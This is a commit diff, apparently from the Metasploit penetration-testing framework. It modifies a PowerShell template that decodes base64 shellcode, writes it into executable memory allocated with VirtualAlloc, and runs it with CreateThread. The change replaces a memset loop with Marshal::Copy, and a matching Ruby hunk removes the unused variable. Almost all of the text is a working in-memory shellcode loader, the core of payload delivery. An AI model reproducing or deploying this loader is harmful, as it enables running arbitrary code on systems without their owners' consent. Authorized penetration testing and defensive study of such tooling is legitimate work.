Meatballs
parent
deefabb559
commit
14c0096115
|
|
@ -21,11 +21,7 @@ function %{func_get_delegate_type} {
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||||
|
|
||||||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
||||||
$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
||||||
|
|
||||||
for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
|
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
||||||
$%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
|
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
||||||
}
|
|
||||||
|
|
||||||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
|
|
||||||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
|
|
||||||
|
|
@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector'
|
||||||
rig.init_var(:var_return_type)
|
rig.init_var(:var_return_type)
|
||||||
rig.init_var(:var_type_builder)
|
rig.init_var(:var_type_builder)
|
||||||
rig.init_var(:var_buffer)
|
rig.init_var(:var_buffer)
|
||||||
rig.init_var(:var_memset)
|
|
||||||
rig.init_var(:var_hthread)
|
rig.init_var(:var_hthread)
|
||||||
|
|
||||||
hash_sub = rig.to_h
|
hash_sub = rig.to_h
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue